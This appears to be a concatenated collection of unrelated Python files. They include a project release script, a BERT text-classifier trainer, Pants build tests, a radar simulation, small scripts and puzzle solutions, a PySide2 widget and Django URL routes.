m2 = self.str_XOR(c['C2'], kprimeStr)
x = m2.split(':')[1]
k = encap.R(pk['pub'], c['ID'], x)
C1prime = pickleObject(serializeObject(c['C1'], group))
if(c['tag'] == hmac.new(k, C1prime+c['C2'], hashlib.sha1).digest()):
return m2.split(':')[0]
else:
return b'FALSE'
|
#!/usr/bin/env python3
"""Release script for ODL projects"""
import argparse
import asyncio
import re
import os
from subprocess import CalledProcessError
from pkg_resources import parse_version
from async_subprocess import (
call,
check_call,
check_output,
)
from constants import (
GIT_RELEASE_NOTES_PATH,
SCRIPT_DIR,
)
from exception import ReleaseException
from github import create_pr
from lib import (
init_working_dir,
VERSION_RE,
)
class DependencyException(Exception):
"""Error if dependency is missing"""
class UpdateVersionException(Exception):
"""Error if the old version is invalid or cannot be found, or if there's a duplicate version"""
class VersionMismatchException(Exception):
"""Error if the version is unexpected"""
async def dependency_exists(command):
"""Returns true if a command exists on the system"""
return await call(["which", command], cwd="/") == 0
async def validate_dependencies():
"""Error if a dependency is missing or invalid"""
if not await dependency_exists("git"):
raise DependencyException('Please install git https://git-scm.com/downloads')
if not await dependency_exists("node"):
raise DependencyException('Please install node.js https://nodejs.org/')
if not await dependency_exists(GIT_RELEASE_NOTES_PATH):
raise DependencyException("Please run 'npm install' first")
version_output = await check_output(["node", "--version"], cwd="/")
version = version_output.decode()
major_version = int(re.match(r'^v(\d+)\.', version).group(1))
if major_version < 6:
raise DependencyException("node.js must be version 6.x or higher")
def update_version_in_file(root, filename, new_version):
"""
Update the version from the file and return the old version if it's found
"""
version_filepath = os.path.join(root, filename)
file_lines = []
update_count = 0
old_version = None
with open(version_filepath) as f:
for line in f.readlines():
line = line.strip("\n")
updated_line = line
if filename == "settings.py":
regex = r"^VERSION = .*(?P<version>{}).*$".format(VERSION_RE)
match = re.match(regex, line)
if match:
update_count += 1
old_version = match.group('version').strip()
updated_line = re.sub(regex, "VERSION = \"{}\"".format(new_version), line)
elif filename == "__init__.py":
regex = r"^__version__ ?=.*(?P<version>{}).*".format(VERSION_RE)
match = re.match(regex, line)
if match:
update_count += 1
old_version = match.group('version').strip()
updated_line = re.sub(regex, "__version__ = '{}'".format(new_version), line)
elif filename == "setup.py":
regex = r"\s*version=.*(?P<version>{}).*".format(VERSION_RE)
match = re.match(regex, line)
if match:
update_count += 1
old_version = match.group('version').strip()
updated_line = re.sub(regex, "version='{}',".format(new_version), line)
file_lines.append("{}\n".format(updated_line))
if update_count == 1:
# Replace contents of file with updated version
with open(version_filepath, "w") as f:
for line in file_lines:
f.write(line)
return old_version
elif update_count > 1:
raise UpdateVersionException("Expected only one version for {file} but found {count}".format(
file=filename,
count=update_count,
))
# Unable to find old version for this file, but maybe there's another one
return None
def update_version(new_version, *, working_dir):
"""Update the version from the project and return the old one, or raise an exception if none is found"""
print("Updating version...")
exclude_dirs = ('.cache', '.git', '.settings', )
version_files = ('settings.py', '__init__.py', 'setup.py')
found_version_filename = None
old_version = None
for version_filename in version_files:
for root, dirs, filenames in os.walk(working_dir, topdown=True):
dirs[:] = [d for d in dirs if d not in exclude_dirs]
if version_filename in filenames:
version = update_version_in_file(root, version_filename, new_version)
if version:
if not found_version_filename:
found_version_filename = version_filename
old_version = version
else:
raise UpdateVersionException(
"Found at least two files with updatable versions: {} and {}".format(
found_version_filename,
version_filename,
)
)
if not found_version_filename:
raise UpdateVersionException("Unable to find previous version number")
return old_version
async def any_new_commits(version, *, base_branch, root):
"""
Return true if there are any new commits since a release
Args:
version (str): A version string
base_branch (str): The branch to compare against
root (str): The project root directory
Returns:
bool: True if there are new commits
"""
output = await check_output(["git", "rev-list", "--count", f"v{version}..{base_branch}", "--"], cwd=root)
return int(output) != 0
async def create_release_notes(old_version, with_checkboxes, *, base_branch, root):
"""
Returns the release note text for the commits made for this version
Args:
old_version (str): The starting version of the range of commits
with_checkboxes (bool): If true, create the release notes with spaces for checkboxes
base_branch (str): The base branch to compare against
root (str): The project root directory
Returns:
str: The release notes
"""
if with_checkboxes:
filename = "release_notes.ejs"
else:
filename = "release_notes_rst.ejs"
if not await any_new_commits(old_version, base_branch=base_branch, root=root):
return "No new commits"
output = await check_output([
GIT_RELEASE_NOTES_PATH,
f"v{old_version}..{base_branch}",
os.path.join(SCRIPT_DIR, "util", filename),
], cwd=root)
return "{}\n".format(output.decode().strip())
async def verify_new_commits(old_version, *, base_branch, root):
"""Check if there are new commits to release"""
if not await any_new_commits(old_version, base_branch=base_branch, root=root):
raise ReleaseException("No new commits to put in release")
async def update_release_notes(old_version, new_version, *, base_branch, root):
"""Updates RELEASE.rst and commits it"""
release_notes = await create_release_notes(old_version, with_checkboxes=False, base_branch=base_branch, root=root)
release_filename = os.path.join(root, "RELEASE.rst")
try:
with open(release_filename) as f:
existing_note_lines = f.readlines()
except FileNotFoundError:
existing_note_lines = []
with open(release_filename, "w") as f:
f.write("Release Notes\n")
f.write("=============\n")
f.write("\n")
version_line = "Version {}".format(new_version)
f.write("{}\n".format(version_line))
f.write("{}\n".format("-" * len(version_line)))
f.write("\n")
f.write(release_notes)
f.write("\n")
# skip first four lines which contain the header we are replacing
for old_line in existing_note_lines[3:]:
f.write(old_line)
await check_call(["git", "add", release_filename], cwd=root)
await check_call(["git", "commit", "-q", "--all", "--message", f"Release {new_version}"], cwd=root)
async def build_release(*, root):
"""Deploy the release candidate"""
print("Building release...")
await check_call(["git", "push", "--force", "-q", "origin", "release-candidate:release-candidate"], cwd=root)
async def generate_release_pr(*, github_access_token, repo_url, old_version, new_version, base_branch, root):
"""
Make a release pull request for the deployed release-candidate branch
Args:
github_access_token (str): The github access token
repo_url (str): URL for the repo
old_version (str): The previous release version
new_version (str): The version of the new release
base_branch (str): The base branch to compare against
root (str): The project root directory
"""
print("Generating PR...")
await create_pr(
github_access_token=github_access_token,
repo_url=repo_url,
title="Release {version}".format(version=new_version),
body=await create_release_notes(old_version, with_checkboxes=True, base_branch=base_branch, root=root),
head="release-candidate",
base="release",
)
async def release(github_access_token, repo_url, new_version, branch=None, commit_hash=None):
"""
Run a release
Args:
github_access_token (str): The github access token
repo_url (str): URL for a repo
new_version (str): The version of the new release
branch (str): The branch to initialize the release from
commit_hash (str): Commit hash to cherry pick in case of a hot fix
"""
await validate_dependencies()
async with init_working_dir(github_access_token, repo_url, branch=branch) as working_dir:
await check_call(["git", "checkout", "-qb", "release-candidate"], cwd=working_dir)
if commit_hash:
try:
await check_call(["git", "cherry-pick", commit_hash], cwd=working_dir)
except CalledProcessError:
raise ReleaseException(f"Cherry pick failed for the given hash {commit_hash}")
old_version = update_version(new_version, working_dir=working_dir)
if parse_version(old_version) >= parse_version(new_version):
raise ReleaseException("old version is {old} but the new version {new} is not newer".format(
old=old_version,
new=new_version,
))
base_branch = "release-candidate" if commit_hash else "master"
await verify_new_commits(old_version, base_branch=base_branch, root=working_dir)
await update_release_notes(old_version, new_version, base_branch=base_branch, root=working_dir)
await build_release(root=working_dir)
await generate_release_pr(
github_access_token=github_access_token,
repo_url=repo_url,
old_version=old_version,
new_version=new_version,
base_branch=base_branch,
root=working_dir,
)
print(f"version {old_version} has been updated to {new_version}")
print("Go tell engineers to check their work. PR is on the repo.")
print("After they are done, run the finish_release.py script.")
def main():
"""
Create a new release
"""
try:
github_access_token = os.environ['GITHUB_ACCESS_TOKEN']
except KeyError:
raise Exception("Missing GITHUB_ACCESS_TOKEN")
parser = argparse.ArgumentParser()
parser.add_argument("repo_url")
parser.add_argument("version")
args = parser.parse_args()
asyncio.run(release(
github_access_token=github_access_token,
repo_url=args.repo_url,
new_version=args.version,
))
if __name__ == "__main__":
main()
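# Example invocation (a sketch; the script name and repository URL are assumptions):
#   GITHUB_ACCESS_TOKEN=... python release.py git@github.com:example-org/example-repo.git 0.3.0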
|
#Spritesheet loading and parsing
import pygame
from Constants import *
class Spritesheet:
def __init__(self,filename):
self.spritesheet = pygame.image.load(filename).convert()
def get_image(self,x,y,width,height):
#grab an image out of a larger spritesheet
image = pygame.Surface((width,height))
image.blit(self.spritesheet, (0,0), (x,y,width,height))
return image
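# Usage sketch (assumes a pygame display has been created, since convert()
# requires one, and that 'sheet.png' exists):
#
#     pygame.init()
#     screen = pygame.display.set_mode((640, 480))
#     sheet = Spritesheet('sheet.png')
#     frame = sheet.get_image(0, 0, 32, 32)   # grab a 32x32 sprite at the top-left
#     screen.blit(frame, (100, 100))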
|
import numpy as np
import time
import datetime
import random
import pandas as pd
import torch
from torch.utils.data import DataLoader, SequentialSampler, RandomSampler
from transformers import BertForSequenceClassification, get_linear_schedule_with_warmup, AdamW
from fnp.utils.data.csv_tensor_dataset import CSVTensorDataset
from sklearn.metrics import accuracy_score, precision_recall_fscore_support
class CSVClassifier:
def __init__(self, config):
self.config = config
self.train_epoch = 0
self.num_labels = 0
def train(self):
train_data_loader = self.load_data(self.config.train_file, RandomSampler)
validation_data_loader = self.load_data(self.config.validation_file)
self.train_on_dataset(train_data_loader, validation_data_loader)
def validate(self):
validation_data_loader = self.load_data(self.config.validation_file)
model = torch.load(self.config.model_input)
self.validate_on_dataset(model, validation_data_loader)
def load_model(self, num_labels=7):
model = BertForSequenceClassification.from_pretrained(
self.config.model_name, # Use the 12-layer BERT model, with an uncased vocab.
num_labels=num_labels, # The number of output labels--2 for binary classification.
# You can increase this for multi-class tasks.
output_attentions=False, # Whether the model returns attentions weights.
output_hidden_states=False, # Whether the model returns all hidden-states.
)
# Tell pytorch to run this model on the GPU.
model.to(self.config.device)
return model
    def format_time(self, elapsed):
'''
Takes a time in seconds and returns a string hh:mm:ss
'''
# Round to the nearest second.
elapsed_rounded = int(round((elapsed)))
# Format as hh:mm:ss
return str(datetime.timedelta(seconds=elapsed_rounded))
def train_on_dataset( self, train_dataloader, validation_dataloader):
model = self.load_model(num_labels=self.num_labels)
# Note: AdamW is a class from the huggingface library (as opposed to pytorch)
# I believe the 'W' stands for 'Weight Decay fix"
optimizer = AdamW(model.parameters(),
lr=2e-5, # args.learning_rate - default is 5e-5, our notebook had 2e-5
eps=1e-8 # args.adam_epsilon - default is 1e-8.
)
# Total number of training steps is number of batches * number of epochs.
total_steps = len(train_dataloader) * self.config.epochs
# Create the learning rate scheduler.
scheduler = get_linear_schedule_with_warmup(optimizer,
num_warmup_steps=0, # Default value in run_glue.py
num_training_steps=total_steps)
# This training code is based on the `run_glue.py` script here:
# https://github.com/huggingface/transformers/blob/5bfcd0485ece086ebcbed2d008813037968a9e58/examples/run_glue.py#L128
# Set the seed value all over the place to make this reproducible.
random.seed(self.config.seed)
np.random.seed(self.config.seed)
torch.manual_seed(self.config.seed)
torch.cuda.manual_seed_all(self.config.seed)
# Store the average loss after each epoch so we can plot them.
loss_values = []
# For each epoch...
for epoch_i in range(0, self.config.epochs):
self.train_epoch = epoch_i
# ========================================
# Training
# ========================================
# Perform one full pass over the training set.
print("")
print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, self.config.epochs))
print('Training...')
# Measure how long the training epoch takes.
t0 = time.time()
# Reset the total loss for this epoch.
total_loss = 0
            # Put the model into training mode. Don't be misled--the call to
# `train` just changes the *mode*, it doesn't *perform* the training.
# `dropout` and `batchnorm` layers behave differently during training
# vs. test (source: https://stackoverflow.com/questions/51433378/what-does-model-train-do-in-pytorch)
model.train()
# For each batch of training data...
for step, batch in enumerate(train_dataloader):
# Progress update every 40 batches.
if step % 40 == 0 and not step == 0:
# Calculate elapsed time in minutes.
elapsed = self.format_time(time.time() - t0)
# Report progress.
print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))
# Unpack this training batch from our dataloader.
#
# As we unpack the batch, we'll also copy each tensor to the GPU using the
# `to` method.
#
# `batch` contains three pytorch tensors:
# [0]: input ids
# [1]: attention masks
# [2]: labels
b_input_ids = batch[0].to(self.config.device)
b_input_mask = batch[1].to(self.config.device)
b_labels = batch[2].to(self.config.device)
# Always clear any previously calculated gradients before performing a
# backward pass. PyTorch doesn't do this automatically because
# accumulating the gradients is "convenient while training RNNs".
# (source: https://stackoverflow.com/questions/48001598/why-do-we-need-to-call-zero-grad-in-pytorch)
model.zero_grad()
# Perform a forward pass (evaluate the model on this training batch).
# This will return the loss (rather than the model output) because we
# have provided the `labels`.
# The documentation for this `model` function is here:
# https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification
outputs = model(b_input_ids,
token_type_ids=None,
attention_mask=b_input_mask,
labels=b_labels)
# The call to `model` always returns a tuple, so we need to pull the
# loss value out of the tuple.
loss = outputs[0]
# Accumulate the training loss over all of the batches so that we can
# calculate the average loss at the end. `loss` is a Tensor containing a
# single value; the `.item()` function just returns the Python value
# from the tensor.
total_loss += loss.item()
# Perform a backward pass to calculate the gradients.
loss.backward()
# Clip the norm of the gradients to 1.0.
# This is to help prevent the "exploding gradients" problem.
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
# Update parameters and take a step using the computed gradient.
# The optimizer dictates the "update rule"--how the parameters are
# modified based on their gradients, the learning rate, etc.
optimizer.step()
# Update the learning rate.
scheduler.step()
# Calculate the average loss over the training data.
avg_train_loss = total_loss / len(train_dataloader)
# Store the loss value for plotting the learning curve.
loss_values.append(avg_train_loss)
print("")
print(" Average training loss: {0:.4f}".format(avg_train_loss))
print(" Training epcoh took: {:}".format(self.format_time(time.time() - t0)))
self.validate_on_dataset(model, validation_dataloader)
if (self.config.model_out is not None) and ((epoch_i + 1) % 4 == 0):
torch.save(model, self.config.model_out + "_" + str(epoch_i + 1) + ".pt")
print("")
print("Training complete!")
def validate_on_dataset(self, model, validation_dataloader):
# ========================================
# Validation
# ========================================
# After the completion of each training epoch, measure our performance on
# our validation set.
print("")
print("Running Validation...")
t0 = time.time()
# Put the model in evaluation mode--the dropout layers behave differently
# during evaluation.
model.eval()
# Gold labels per batch
labels_per_batch = []
# Input sequence per batch
input_ids_per_batch = []
# Prediction weights per batch
outputs_per_batch = []
# Evaluate data for one epoch
for batch in validation_dataloader:
# Add batch to GPU
batch = tuple(t.to(self.config.device) for t in batch)
# Unpack the inputs from our dataloader
b_input_ids, b_input_mask, b_labels = batch
# Telling the model not to compute or store gradients, saving memory and
# speeding up validation
with torch.no_grad():
# Forward pass, calculate logit predictions.
# This will return the logits rather than the loss because we have
# not provided labels.
# token_type_ids is the same as the "segment ids", which
# differentiates sentence 1 and 2 in 2-sentence tasks.
# The documentation for this `model` function is here:
# https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification
outputs = model(b_input_ids,
token_type_ids=None,
attention_mask=b_input_mask)
labels_per_batch.append(b_labels)
input_ids_per_batch.append(b_input_ids)
outputs_per_batch.append(outputs)
input_ids_list = self.convert_batch_of_input_ids_to_list(input_ids_per_batch)
label_list = self.convert_batch_of_labels_to_list(labels_per_batch)
logit_list = self.convert_batch_of_outputs_to_list_of_logits(outputs_per_batch)
self.evaluate(input_ids_list, label_list, logit_list)
self.write_results(input_ids_list, label_list, logit_list)
def convert_batch_of_labels_to_list(self, labels_per_batch):
label_list = []
for b_labels in labels_per_batch:
label_list += list(b_labels.to('cpu').numpy())
return label_list
def convert_batch_of_input_ids_to_list(self, input_ids_per_batch):
input_id_list = []
for b_input_ids in input_ids_per_batch:
input_id_list += list(b_input_ids.to('cpu').numpy())
return input_id_list
def convert_batch_of_outputs_to_list_of_logits(self, output):
logit_list = []
for b_output in output:
logit_list += list(b_output[0].detach().cpu().numpy())
return logit_list
def evaluate(self, input_id_list, label_list, logit_list):
preds = np.argmax(logit_list, axis=1).flatten()
self.evaluate_head(label_list, preds)
def evaluate_head(self, y_true, y_pred):
"""
Evaluate Precision, Recall, F1 scores between y_true and y_pred
If output_file is provided, scores are saved in this file otherwise printed to std output.
:param y_true: true labels
:param y_pred: predicted labels
:return: list of scores (F1, Recall, Precision, ExactMatch)
"""
assert len(y_true) == len(y_pred)
print()
print("Accuracy: " + str(accuracy_score(y_true, y_pred)))
precision, recall, f1, _ = precision_recall_fscore_support(y_true, y_pred, labels=[0, 1],
average='weighted')
scores = [
"F1: %f\n" % f1,
"Recall: %f\n" % recall,
"Precision: %f\n" % precision,
"ExactMatch: %f\n" % -1.0
]
for s in scores:
print(s, end='')
def load_data(self, file, sampler=SequentialSampler):
data = CSVTensorDataset(file, max_len=self.config.max_len, tokenizer_name=self.config.model_name)
sampler = sampler(data)
data_loader = DataLoader(data, sampler=sampler, batch_size=self.config.batch_size, num_workers=0)
if self.num_labels == 0:
self.num_labels = data.num_labels
return data_loader
def write_results(self, input_id_list, label_list, logit_list):
self.write_results_on_head(input_id_list, label_list, logit_list)
def write_results_on_head(self, input_id_list, label_list, logit_list, file_name_params=""):
if self.config.out_file is not None:
preds = np.argmax(logit_list, axis=1).flatten()
pd.DataFrame(preds, columns=["pred"]).to_csv(self.config.out_file + str(self.train_epoch) + "." + file_name_params + ".csv", index=False)
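# Minimal configuration sketch (illustrative; the attribute names are taken from
# the usages above, the values are assumptions):
#
#     from types import SimpleNamespace
#     config = SimpleNamespace(
#         model_name="bert-base-uncased",
#         train_file="train.csv", validation_file="valid.csv",
#         model_input="model.pt", model_out="model", out_file="preds_",
#         device="cuda", epochs=4, seed=42, max_len=128, batch_size=32,
#     )
#     CSVClassifier(config).train()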
|
r, c = map(int, input().split())
cake_row = [input() for i in range(r)]
free_row = len([1 for i in cake_row if 'S' not in i])
free_col = len([1 for i in zip(*cake_row) if 'S' not in i])
print(free_col * (r-free_row) + free_row*c)
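# Note: free_row rows and free_col columns contain no 'S'; eating them covers
# free_row*c + free_col*r cells minus the free_row*free_col cells counted twice,
# which the print above expresses as free_col*(r - free_row) + free_row*c.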
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os
import pytest
from pants.backend.helm.goals import package
from pants.backend.helm.goals.package import BuiltHelmArtifact, HelmPackageFieldSet
from pants.backend.helm.subsystems.helm import HelmSubsystem
from pants.backend.helm.target_types import HelmChartTarget
from pants.backend.helm.target_types import rules as target_types_rules
from pants.backend.helm.testutil import (
HELM_TEMPLATE_HELPERS_FILE,
HELM_VALUES_FILE,
K8S_SERVICE_TEMPLATE,
gen_chart_file,
)
from pants.backend.helm.util_rules import chart, sources, tool
from pants.build_graph.address import Address
from pants.core.goals.package import BuiltPackage
from pants.core.util_rules import config_files, external_tool, source_files
from pants.engine.rules import QueryRule
from pants.source.source_root import rules as source_root_rules
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
target_types=[HelmChartTarget],
rules=[
*config_files.rules(),
*external_tool.rules(),
*tool.rules(),
*chart.rules(),
*package.rules(),
*source_files.rules(),
*source_root_rules(),
*sources.rules(),
*target_types_rules(),
*HelmSubsystem.rules(),
QueryRule(BuiltPackage, [HelmPackageFieldSet]),
],
)
def _assert_build_package(rule_runner: RuleRunner, *, chart_name: str, chart_version: str) -> None:
target = rule_runner.get_target(Address(f"src/{chart_name}", target_name=chart_name))
field_set = HelmPackageFieldSet.create(target)
dest_dir = field_set.output_path.value_or_default(file_ending=None)
result = rule_runner.request(BuiltPackage, [field_set])
assert len(result.artifacts) == 1
assert isinstance(result.artifacts[0], BuiltHelmArtifact)
assert result.artifacts[0].relpath == os.path.join(
dest_dir, f"{chart_name}-{chart_version}.tgz"
)
assert result.artifacts[0].info
def test_helm_package(rule_runner: RuleRunner) -> None:
chart_name = "foo"
chart_version = "0.1.0"
rule_runner.write_files(
{
f"src/{chart_name}/BUILD": f"helm_chart(name='{chart_name}')",
f"src/{chart_name}/Chart.yaml": gen_chart_file(chart_name, version=chart_version),
f"src/{chart_name}/values.yaml": HELM_VALUES_FILE,
f"src/{chart_name}/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
f"src/{chart_name}/templates/service.yaml": K8S_SERVICE_TEMPLATE,
}
)
_assert_build_package(rule_runner, chart_name=chart_name, chart_version=chart_version)
def test_helm_package_with_custom_output_path(rule_runner: RuleRunner) -> None:
chart_name = "bar"
chart_version = "0.2.0"
output_path = "charts"
rule_runner.write_files(
{
f"src/{chart_name}/BUILD": f"""helm_chart(name="{chart_name}", output_path="{output_path}")""",
f"src/{chart_name}/Chart.yaml": gen_chart_file(chart_name, version=chart_version),
f"src/{chart_name}/values.yaml": HELM_VALUES_FILE,
f"src/{chart_name}/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
f"src/{chart_name}/templates/service.yaml": K8S_SERVICE_TEMPLATE,
}
)
_assert_build_package(rule_runner, chart_name=chart_name, chart_version=chart_version)
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.python.target_types import (
PythonSourcesGeneratorTarget,
PythonSourceTarget,
PythonTestsGeneratorTarget,
PythonTestTarget,
PythonTestUtilsGeneratorTarget,
)
from pants.engine.target import BoolField
class SkipFlake8Field(BoolField):
alias = "skip_flake8"
default = False
help = "If true, don't run Flake8 on this target's code."
def rules():
return [
PythonSourcesGeneratorTarget.register_plugin_field(SkipFlake8Field),
PythonSourceTarget.register_plugin_field(SkipFlake8Field),
PythonTestsGeneratorTarget.register_plugin_field(SkipFlake8Field),
PythonTestTarget.register_plugin_field(SkipFlake8Field),
PythonTestUtilsGeneratorTarget.register_plugin_field(SkipFlake8Field),
]
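# Typically exposed from an in-repo plugin's register.py (a sketch; the module
# path used in the import is an assumption):
#
#     from flake8_skip_field import rules as skip_flake8_rules
#     def rules():
#         return [*skip_flake8_rules()]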
|
# File: shopping.py
# Author: Joel Okpara
# Date: 3/7/2016
# Section: 04
# E-mail: joelo1@umbc.edu
# Description: allows the user to create a shopping list and calculate
# how much the shopping trip cost.
def main():
shopping = ""
shoppingList = []
while shopping != "done":
shopping = input("Add an item to your list(type 'done' when finished): ")
shoppingList.append(shopping)
shoppingList.remove("done")
if shopping == "done":
print("Your final shopping list: ",shoppingList)
print()
total = 0
while len(shoppingList)> 0:
itemPrice = float(input("How much did "+shoppingList[0]+" cost? "))
total = total + itemPrice
shoppingList.remove(shoppingList[0])
print()
print("Your shopping trip cost $"+str(total))
print("Shopping list at end of trip: ",shoppingList)
main()
|
# -*- coding: utf-8 -*-
class Solution:
def secondHighest(self, s: str) -> int:
digits = {int(c) for c in s if c.isdigit()}
if len(digits) < 2:
return -1
*_, result, _ = sorted(list(digits))
return result
if __name__ == "__main__":
solution = Solution()
assert 2 == solution.secondHighest("dfa12321afd")
assert -1 == solution.secondHighest("abc1111")
assert 0 == solution.secondHighest("ck077")
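# Note: `*_, result, _ = sorted(digits)` binds the second-largest distinct digit
# to `result`, since the sorted set is ascending and is guaranteed here to have
# at least two elements.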
|
import sys
import os
f = open("C:/Users/user/Documents/python/import.txt","r")
sys.stdin = f
# -*- coding: utf-8 -*-
s = str(input())
one = 0
zero = 0
for i in s:
if i == "0":
zero += 1
else:
one += 1
if zero > one:
print(one * 2)
else:
print(zero * 2)
|
#!/usr/bin/python
import time
import numpy as np
start_time=time.time()
debug=True
_code_git_version="fe3342f0a6244db71e585d67179e4c782a7c67e7"
_code_repository="https://github.com/plops/cl-py-generator/tree/master/example/106_sar/source/"
_code_generation_time="22:23:37 of Thursday, 2023-04-20 (GMT+1)"
# speed of light (m/s)
c=(3.0e+8)
# center frequency (Hz)
fc=(5.5e+9)
# wavelength (m)
wavelength=((c)/(fc))
# platform_speed (m/s)
platform_speed=100
# platform altitude (m)
altitude=5000
# simulation duration (s)
duration=10
# sample_rate (Hz)
sample_rate=1000
# bandwidth (Hz)
bw=(5.0e+7)
# pulse duration (s)
T_p=(1.00e-5)
# chirp rate (Hz/s)
K=((bw)/(T_p))
# scattering targets on the ground plane (m)
scatter_points=np.array([[3000, 5000], [5000, 8000], [8000, 15000]])
# time array (s)
tt=np.arange(0, duration, ((1)/(sample_rate)))
# position array (m)
platform_positions=((platform_speed)*(tt))
# slant ranges for each scatter point (m)
slant_ranges=np.sqrt(((((altitude)**(2)))+(((((scatter_points[:,0])-(platform_positions[:,np.newaxis])))**(2)))))
# round-trip time delay (s)
time_delays=((2)*(((slant_ranges)/(c))))
# time axis for pulse (s)
t_chirp=np.arange(0, T_p, ((1)/(sample_rate)))
# chirped radar pulse amplitude (amplitude)
transmitted_signal=np.exp(((1j)*(np.pi)*(K)*(((t_chirp)**(2)))))
# radial speed difference between platform and target (m/s)
v_radial=((((-platform_speed)*(((scatter_points[:,0])-(platform_positions[:,np.newaxis])))))/(slant_ranges))
# doppler_shifts (Hz)
doppler_shifts=((2)*(((v_radial)/(wavelength))))
# received_signal (amplitude)
received_signal=np.zeros((len(tt),len(transmitted_signal),), dtype=complex)
for scatter_idx in range(scatter_points.shape[0]):
delay_samples=np.round(((time_delays[:,scatter_idx])*(sample_rate))).astype(int)
for idx, delay in enumerate(delay_samples):
if ( ((((0)<=(delay))) and (((delay)<(len(transmitted_signal))))) ):
received_signal[idx] += ((np.exp(((1j)*(2)*(np.pi)*(doppler_shifts[idx,scatter_idx])*(t_chirp))))*(transmitted_signal[delay:]))
# noise_level (amplitude)
noise_level=(1.00e-5)
# received_signal (-)
received_signal=((received_signal)+(((noise_level)*(((np.random.randn(*received_signal.shape))+(((1j)*(np.random.randn(*received_signal.shape)))))))))
|
import resources as res
from datetime import datetime
import time
urls = res.read_file('categories')
while True:
if int(datetime.now().strftime('%M')) % 10 == 0:
file = open('data/' + datetime.now().strftime('%Y-%m-%d_%H-%M'), 'w+')
for url in urls:
data = res.get_data(url)
headers = res.get_headers(data)
row_data = res.get_rows(data, len(headers))
for row in row_data:
new_item = ""
for item in row:
new_item += item + ';'
file.write(new_item[:-1] + '\n')
file.close()
print("Writing done: " + datetime.now().strftime('%Y-%m-%d_%H-%M'))
time.sleep(61)
res.close_browser()
|
# -*- coding: utf-8 -*-
# @Time :2020/7/23 17:22
# @FileName :card.py
# @Author :LiuYang
from PySide2 import QtGui
from PySide2 import QtWidgets
from PySide2 import QtCore
from Libs import package
class Card(QtWidgets.QFrame):
double_click = QtCore.Signal(int)
left_clicked = QtCore.Signal(dict)
def __init__(self, project_data):
super(Card, self).__init__()
self.setObjectName("Card")
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.FramelessWindowHint)
self.setFixedSize(300, 200)
self.project_object = project_data
cover, title = self.__format_project_data(self.project_object)
# image = package.get('icon/know.jpg')
self._preview_image = QtGui.QPixmap(cover).scaled(300, 150)
# self._preview_image = QtGui.QPixmap(image).scaled(300, 150)
self.MainLayout = QtWidgets.QVBoxLayout(self)
self.MainLayout.setContentsMargins(0, 0, 0, 0)
self.imageLabel = QtWidgets.QLabel()
self.imageLabel.setPixmap(self._preview_image)
self.informationLayout = QtWidgets.QHBoxLayout()
self.informationLayout.setContentsMargins(0, 0, 0, 0)
# title = u"测试任务"
self.nameLabel = QtWidgets.QLabel(title)
self.setup_ui()
self.set_style_sheet()
@staticmethod
def __format_project_data(project_data):
title = project_data.name
if len(title) > 8:
title = "{}...".format(title[:5].encode("utf-8"))
return QtGui.QPixmap(package.get('icon/know.jpg')).scaled(350, 200), title
def setup_ui(self):
self.MainLayout.addWidget(self.imageLabel)
self.MainLayout.addLayout(self.informationLayout)
self.informationLayout.addWidget(self.nameLabel)
def set_style_sheet(self):
self.setStyleSheet("background-color: #323232")
self.nameLabel.setStyleSheet("font: 14pt '微软雅黑';color:#cccccc")
def leaveEvent(self, event):
self.setStyleSheet("background-color: #323232")
def enterEvent(self, event):
self.setStyleSheet("background-color: #2db7f5")
def mousePressEvent(self, event):
if event.buttons() == QtCore.Qt.LeftButton:
self.left_clicked.emit({"name": self.project_object.name, "id":self.project_object.id})
def mouseDoubleClickEvent(self, event):
if event.buttons() == QtCore.Qt.LeftButton:
self.double_click.emit(self.project_object.id)
if __name__ == "__main__":
app = QtWidgets.QApplication([])
Alert_Example = Card("1")
Alert_Example.show()
app.exec_()
|
import argparse
from convertor.encode_convertor import encode as encod
from convertor.decode_convertor import Decoder
import re
import sys
import string
#KEY_FILE = 'key'
from pathlib import Path
import os
import convertor
KEY_FILE = Path(os.path.dirname(convertor.__file__)) / 'key'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('source_text',
type=str,
help='Returns encoded or decode text')
return parser.parse_args()
def decode():
text = str(sys.argv[1])
code = Decoder(KEY_FILE)
text = code.convert_text(text)
return text
def encode():
text = str(sys.argv[1])
code = encod(KEY_FILE)
text = code.convert_text(text)
return text
def prepare_text_source(text: str):
# string.punctuation must be escaped and wrapped in a character class to form a valid regex
return re.sub('[' + re.escape(string.punctuation) + ']', '', text.lower())
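# Illustrative usage sketch (not part of the original module): prepare_text_source
# lowercases the text and strips punctuation, e.g.
#   prepare_text_source("Hello, World!")  ->  "hello world"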
|
#encoding=utf8
import os,sys
BASE_DIR='/home/wdm/Desktop/monitor_linux_server/'
sys.path.append(BASE_DIR)
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name="home"),
path('listing/', views.listing, name="listing"),
path('listing/<int:immo_id>/', views.listing_detail, name="detail"),
]
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import threading
import time
import re
from datetime import datetime
from pytz import timezone, UTC
import requests
import pysolr
from shapely import wkt
from elasticsearch import Elasticsearch
